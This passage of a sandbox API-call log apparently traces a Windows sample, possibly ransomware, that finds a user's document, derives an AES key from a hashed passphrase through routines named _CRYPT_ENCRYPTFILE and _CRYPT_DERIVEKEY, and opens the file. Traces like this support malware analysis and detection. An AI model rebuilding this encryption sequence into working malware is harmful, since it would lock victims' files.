HALPmcxz\\Documents\\KwBYebiNhHcjLML\\ZAkF0mR.pps", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb965a80, ftCreationTime.dwHighDateTime=0x1d5e7d4, ftLastAccessTime.dwLowDateTime=0xce344270, ftLastAccessTime.dwHighDateTime=0x1d5e50b, ftLastWriteTime.dwLowDateTime=0xce344270, ftLastWriteTime.dwHighDateTime=0x1d5e50b, nFileSizeHigh=0x0, nFileSizeLow=0xa1d4, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="ZAkF0mR.pps", cAlternateFileName="")) returned 0x90add8 [0173.585] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0173.585] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0173.585] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\ZAkF0mR.pps", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb965a80, ftCreationTime.dwHighDateTime=0x1d5e7d4, ftLastAccessTime.dwLowDateTime=0xce344270, ftLastAccessTime.dwHighDateTime=0x1d5e50b, ftLastWriteTime.dwLowDateTime=0xce344270, ftLastWriteTime.dwHighDateTime=0x1d5e50b, nFileSizeHigh=0x0, nFileSizeLow=0xa1d4, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="ZAkF0mR.pps", cAlternateFileName="")) returned 0x90add8 [0173.586] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0173.586] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0173.586] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\ZAkF0mR.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.586] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\ZAkF0mR.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.586] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\ZAkF0mR.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.586] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\ZAkF0mR.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.586] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\ZAkF0mR.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.586] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\ZAkF0mR.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.586] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\ZAkF0mR.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.586] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\ZAkF0mR.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.586] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\ZAkF0mR.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.586] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\ZAkF0mR.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.586] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\ZAkF0mR.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.586] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\ZAkF0mR.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.586] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\ZAkF0mR.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.586] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\ZAkF0mR.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.586] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\ZAkF0mR.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.586] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\ZAkF0mR.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.586] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\ZAkF0mR.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.586] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\ZAkF0mR.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.586] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\ZAkF0mR.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.586] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\ZAkF0mR.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.586] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\KwBYebiNhHcjLML\\ZAkF0mR.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.586] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\KwBYebiNhHcjLML\\ZAkF0mR.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.586] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\KwBYebiNhHcjLML\\ZAkF0mR.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.586] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\KwBYebiNhHcjLML\\ZAkF0mR.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.586] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\KwBYebiNhHcjLML\\ZAkF0mR.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.586] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\KwBYebiNhHcjLML\\ZAkF0mR.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.587] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\KwBYebiNhHcjLML\\ZAkF0mR.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.587] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\KwBYebiNhHcjLML\\ZAkF0mR.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.587] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\KwBYebiNhHcjLML\\ZAkF0mR.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.587] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\KwBYebiNhHcjLML\\ZAkF0mR.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.587] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\KwBYebiNhHcjLML\\ZAkF0mR.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.587] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\KwBYebiNhHcjLML\\ZAkF0mR.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.587] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\KwBYebiNhHcjLML\\ZAkF0mR.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.587] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\KwBYebiNhHcjLML\\ZAkF0mR.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.587] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\KwBYebiNhHcjLML\\ZAkF0mR.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.587] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\KwBYebiNhHcjLML\\ZAkF0mR.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.587] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\KwBYebiNhHcjLML\\ZAkF0mR.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.587] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\KwBYebiNhHcjLML\\ZAkF0mR.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.587] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\KwBYebiNhHcjLML\\ZAkF0mR.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.587] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\KwBYebiNhHcjLML\\ZAkF0mR.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.587] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\KwBYebiNhHcjLML\\ZAkF0mR.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.587] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KwBYebiNhHcjLML\\ZAkF0mR.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.587] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wBYebiNhHcjLML\\ZAkF0mR.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.587] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BYebiNhHcjLML\\ZAkF0mR.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.587] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YebiNhHcjLML\\ZAkF0mR.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.587] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ebiNhHcjLML\\ZAkF0mR.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.587] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="biNhHcjLML\\ZAkF0mR.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.587] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iNhHcjLML\\ZAkF0mR.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.587] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NhHcjLML\\ZAkF0mR.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.587] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hHcjLML\\ZAkF0mR.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.587] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HcjLML\\ZAkF0mR.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.587] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cjLML\\ZAkF0mR.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.587] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jLML\\ZAkF0mR.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.587] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LML\\ZAkF0mR.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.587] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ML\\ZAkF0mR.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.587] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L\\ZAkF0mR.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.587] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ZAkF0mR.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.587] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZAkF0mR.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.587] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AkF0mR.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.588] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kF0mR.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.588] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0173.588] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0173.588] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0173.588] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0173.588] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0173.588] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ps", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0173.588] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pps", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0173.588] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pps", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0173.588] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0173.588] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0173.588] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0173.588] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0173.588] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.588] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\ZAkF0mR.pps", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb965a80, ftCreationTime.dwHighDateTime=0x1d5e7d4, ftLastAccessTime.dwLowDateTime=0xce344270, ftLastAccessTime.dwHighDateTime=0x1d5e50b, ftLastWriteTime.dwLowDateTime=0xce344270, ftLastWriteTime.dwHighDateTime=0x1d5e50b, nFileSizeHigh=0x0, nFileSizeLow=0xa1d4, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="ZAkF0mR.pps", cAlternateFileName="")) returned 0x90af58 [0173.588] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0173.588] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.588] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0173.588] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.588] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0173.588] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0173.589] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.589] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0173.589] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.589] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0173.589] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0173.589] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0173.589] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0173.589] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0b78) returned 1 [0173.590] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0173.590] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0173.590] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0173.590] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0173.590] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0173.590] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0173.590] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0173.591] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0173.591] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0173.591] CryptCreateHash (in: hProv=0x9c0b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0173.591] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0173.591] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0173.591] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0173.591] CryptHashData (hHash=0x90ae18, pbData=0x8dedf8, dwDataLen=0x19, dwFlags=0x1) returned 1 [0173.591] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0173.591] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0173.591] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0173.591] CryptDeriveKey (in: hProv=0x9c0b78, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af18) returned 1 [0173.591] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0173.606] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0173.606] CryptDestroyHash (hHash=0x90ae18) returned 1 [0173.607] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\ZAkF0mR.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kwbyebinhhcjlml\\zakf0mr.pps"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0173.607] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0173.607] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0173.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0173.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0173.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0173.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0173.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0173.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0173.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0173.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0173.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0173.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0173.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0173.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0173.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0173.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0173.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0173.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0173.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0173.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0173.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0173.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0173.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0173.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0173.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0173.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0173.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0173.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0173.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0173.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0173.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0173.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0173.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0173.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0173.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0173.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0173.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0173.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0173.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0173.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0173.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0173.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0173.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0173.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0173.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0173.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0173.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9058 [0173.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0173.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0173.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0173.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fecd8 [0173.609] HeapFree (in: hHeap=0x8a0000, 